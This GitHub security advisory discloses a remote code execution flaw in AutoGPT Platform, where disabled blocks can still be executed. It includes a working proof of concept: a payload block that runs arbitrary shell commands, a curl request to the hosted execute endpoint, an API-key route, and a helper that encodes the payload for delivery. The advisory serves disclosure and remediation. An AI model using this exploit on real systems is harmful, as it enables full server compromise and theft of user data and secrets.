GHSA-R277-3XC5-C79V
Vulnerability from github – Published: 2026-01-29 15:04 – Updated: 2026-01-30 00:04
Summary
AutoGPT Platform's block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the disabled flag. Any authenticated user can execute the disabled BlockInstallationBlock, which writes arbitrary Python code to the server filesystem and executes it via __import__(), achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.
Details
Two vulnerable endpoints exist:
- Main Web API (v1.py#L355-395) - Any authenticated user:
```python
@v1_router.post(
    path="/blocks/{block_id}/execute",
    dependencies=[Security(requires_user)],  # Just requires login
)
async def execute_graph_block(block_id: str, data: BlockInput, ...):
    obj = get_block(block_id)
    if not obj:
        raise HTTPException(status_code=404, ...)

    # NO CHECK FOR obj.disabled!

    async for name, data in obj.execute(data, ...):
        output[name].append(data)
```
- External API (external/v1/routes.py#L79-93) - Same issue.
The external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including EXECUTE_BLOCK) at v1.py#L1408-1424. As a result, a low-privilege user can create an API key and invoke the external block execution route.
The disabled flag is documented but not enforced:
From block.py#L459:
"disabled: If the block is disabled, it will not be available for execution."
The block listing endpoint correctly filters disabled blocks (if not b.disabled), but the execution endpoints do not check this flag.
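A minimal sketch of the missing enforcement. The `Block` dataclass, registry dict, and exception type here are illustrative stand-ins, not the platform's actual types; only the `disabled` attribute is taken from the advisory:

```python
from dataclasses import dataclass

# Hypothetical stand-in for the platform's block registry entry.
@dataclass
class Block:
    id: str
    disabled: bool = False

class BlockNotExecutable(Exception):
    """Stand-in for the HTTP error the real endpoint would raise."""

def get_executable_block(registry: dict[str, Block], block_id: str) -> Block:
    """Resolve a block for execution, honoring the disabled flag."""
    block = registry.get(block_id)
    if block is None:
        raise BlockNotExecutable(f"block {block_id} not found")  # 404 in the real API
    if block.disabled:
        # The check the vulnerable endpoints omit: disabled blocks
        # must be rejected at execution time, not just hidden from listings.
        raise BlockNotExecutable(f"block {block_id} is disabled")
    return block
```

Filtering only at listing time is security by obscurity; the execution path is the trust boundary, so the flag has to be checked there as well.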
The dangerous block (blocks/block.py#L15-78):
```python
class BlockInstallationBlock(Block):
    """
    NOTE: This block allows remote code execution on the server,
    and it should be used for development purposes only.
    """

    def __init__(self):
        super().__init__(
            id="45e78db5-03e9-447f-9395-308d712f5f08",  # Hardcoded, public UUID
            disabled=True,  # NOT ENFORCED!
        )

    async def run(self, input_data: Input, **kwargs) -> BlockOutput:
        code = input_data.code

        # Writes attacker code to server filesystem
        file_path = f"{block_dir}/{file_name}.py"
        with open(file_path, "w") as f:
            f.write(code)

        # Executes via import (RCE)
        module = __import__(module_name, fromlist=[class_name])
```
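The import-equals-execution behavior is standard Python: importing a module runs all of its top-level statements. A self-contained illustration of the mechanism (not the platform's code; it uses `importlib` on a temporary file rather than `__import__` to avoid touching `sys.path`):

```python
import importlib.util
import os
import tempfile

# A "block" file whose top-level code has an observable side effect.
code = "MARKER = []\nMARKER.append('ran at import time')\n"

with tempfile.TemporaryDirectory() as d:
    path = os.path.join(d, "written_block.py")
    with open(path, "w") as f:
        f.write(code)

    # Load the file the way Python's import machinery does.
    spec = importlib.util.spec_from_file_location("written_block", path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)  # top-level statements execute here

    print(module.MARKER)  # → ['ran at import time']
```

Anything an attacker can get written to disk and imported runs with the full privileges of the server process.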
PoC
1. Create malicious block code
```python
PAYLOAD = '''
import os
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.data.model import SchemaField

class RCEBlock(Block):
    class Input(BlockSchemaInput):
        cmd: str = SchemaField(description="Command")
    class Output(BlockSchemaOutput):
        result: str = SchemaField(description="Result")

    def __init__(self):
        super().__init__(
            id="aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
            description="RCE",
            input_schema=self.Input,
            output_schema=self.Output,
        )

    async def run(self, input_data, **kwargs):
        import subprocess
        result = subprocess.check_output(input_data.cmd, shell=True).decode()
        yield "result", result
'''
```
2. Execute via main web API (any logged-in user)
```bash
# Get session cookie by logging into the web UI, then:
curl -X POST "https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute" \
  -H "Cookie: session=<your_session_cookie>" \
  -H "Content-Type: application/json" \
  -d '{"code": "<PAYLOAD>"}'
```
The malicious Python code is written to the server's backend/blocks/ directory and immediately executed via __import__().
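Pasting a multi-line payload directly into `curl -d` is brittle, since raw newlines and quotes break the JSON body. A small sketch of preparing the request body (the `payload` string here is a placeholder, not the PAYLOAD above):

```python
import json

# Stand-in for the PAYLOAD above; any multi-line Python source works.
payload = 'import os\nprint("payload ran")\n'

# JSON-encode the body so newlines and quotes in the code survive transit.
body = json.dumps({"code": payload})
print(body)
```

The resulting string is what the `-d` argument of the curl command above needs to carry.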
Alternative route: Mint an API key with EXECUTE_BLOCK via POST /api-keys, then call the external API POST /external-api/v1/blocks/{id}/execute.
Impact
Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.
This allows:
- Complete server compromise
- Access to all user data, credentials, and API keys stored in the database
- Access to environment variables (cloud credentials, secrets)
- Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services)
- Persistent backdoor installation
Attack requirements:
- Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)
- Know the disabled block's UUID (hardcoded in public source code: 45e78db5-03e9-447f-9395-308d712f5f08)
Why the disabled flag exists but fails:
- Block listing correctly filters disabled blocks (users don't see them in UI)
- Execution endpoints bypass this check entirely
- The UUID is static and publicly known from the open-source codebase
Severity note: CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.
A fix is available in 0.6.44, but it had not been published to the PyPI registry at the time this advisory was published.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "agpt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24780"
],
"database_specific": {
"cwe_ids": [
"CWE-276",
"CWE-863",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-29T15:04:03Z",
"nvd_published_at": "2026-01-29T18:16:17Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAutoGPT Platform\u0027s block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the `disabled` flag. Any authenticated user can execute the disabled `BlockInstallationBlock`, which writes arbitrary Python code to the server filesystem and executes it via `__import__()`, achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.\n\n### Details\n\n**Two vulnerable endpoints exist:**\n\n1. **Main Web API** ([`v1.py#L355-395`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395)) - Any authenticated user:\n\n```python\n@v1_router.post(\n path=\"/blocks/{block_id}/execute\",\n dependencies=[Security(requires_user)], # Just requires login\n)\nasync def execute_graph_block(block_id: str, data: BlockInput, ...):\n obj = get_block(block_id)\n if not obj:\n raise HTTPException(status_code=404, ...)\n\n # NO CHECK FOR obj.disabled!\n\n async for name, data in obj.execute(data, ...):\n output[name].append(data)\n```\n\n2. **External API** ([`external/v1/routes.py#L79-93`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93)) - Same issue.\n\nThe external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including `EXECUTE_BLOCK`) at [`v1.py#L1408-1424`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424). 
As a result, a low-privilege user can create an API key and invoke the external block execution route.\n\n**The disabled flag is documented but not enforced:**\n\nFrom [`block.py#L459`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459):\n\u003e \"disabled: If the block is disabled, it will not be available for execution.\"\n\nThe block listing endpoint correctly filters disabled blocks (`if not b.disabled`), but the execution endpoints do not check this flag.\n\n**The dangerous block ([`blocks/block.py#L15-78`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78)):**\n\n```python\nclass BlockInstallationBlock(Block):\n \"\"\"\n NOTE: This block allows remote code execution on the server,\n and it should be used for development purposes only.\n \"\"\"\n\n def __init__(self):\n super().__init__(\n id=\"45e78db5-03e9-447f-9395-308d712f5f08\", # Hardcoded, public UUID\n disabled=True, # NOT ENFORCED!\n )\n\n async def run(self, input_data: Input, **kwargs) -\u003e BlockOutput:\n code = input_data.code\n\n # Writes attacker code to server filesystem\n file_path = f\"{block_dir}/{file_name}.py\"\n with open(file_path, \"w\") as f:\n f.write(code)\n\n # Executes via import (RCE)\n module = __import__(module_name, fromlist=[class_name])\n```\n\n### PoC\n\n**1. 
Create malicious block code**\n\n```python\nPAYLOAD = \u0027\u0027\u0027\nimport os\nfrom backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput\nfrom backend.data.model import SchemaField\n\nclass RCEBlock(Block):\n class Input(BlockSchemaInput):\n cmd: str = SchemaField(description=\"Command\")\n class Output(BlockSchemaOutput):\n result: str = SchemaField(description=\"Result\")\n\n def __init__(self):\n super().__init__(\n id=\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n description=\"RCE\",\n input_schema=self.Input,\n output_schema=self.Output,\n )\n\n async def run(self, input_data, **kwargs):\n import subprocess\n result = subprocess.check_output(input_data.cmd, shell=True).decode()\n yield \"result\", result\n\u0027\u0027\u0027\n```\n\n**2. Execute via main web API (any logged-in user)**\n\n```bash\n# Get session cookie by logging into the web UI, then:\ncurl -X POST \"https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute\" \\\n -H \"Cookie: session=\u003cyour_session_cookie\u003e\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\": \"\u003cPAYLOAD\u003e\"}\u0027\n```\n\nThe malicious Python code is written to the server\u0027s `backend/blocks/` directory and immediately executed via `__import__()`.\n\n**Alternative route:** Mint an API key with `EXECUTE_BLOCK` via `POST /api-keys`, then call the external API `POST /external-api/v1/blocks/{id}/execute`.\n\n### Impact\n\n**Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.**\n\nThis allows:\n- Complete server compromise\n- Access to all user data, credentials, and API keys stored in the database\n- Access to environment variables (cloud credentials, secrets)\n- Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services)\n- Persistent backdoor installation\n\n**Attack requirements:**\n- Create a free account on the platform (default self-hosted 
enables signup; hosted deployments may disable signup, requiring an existing account)\n- Know the disabled block\u0027s UUID (hardcoded in public source code: `45e78db5-03e9-447f-9395-308d712f5f08`)\n\n**Why the `disabled` flag exists but fails:**\n- Block listing correctly filters disabled blocks (users don\u0027t see them in UI)\n- Execution endpoints bypass this check entirely\n- The UUID is static and publicly known from the open-source codebase\n\n**Severity note:** CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.\n\nA fix is available, but was not published to the PyPI registry at time of publication: [0.6.44](https://github.com/Significant-Gravitas/AutoGPT/releases/tag/v0.6.44)",
"id": "GHSA-r277-3xc5-c79v",
"modified": "2026-01-30T00:04:18Z",
"published": "2026-01-29T15:04:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-r277-3xc5-c79v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24780"
},
{
"type": "PACKAGE",
"url": "https://github.com/Significant-Gravitas/AutoGPT"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "AutoGPT is Vulnerable to RCE via Disabled Block Execution"
}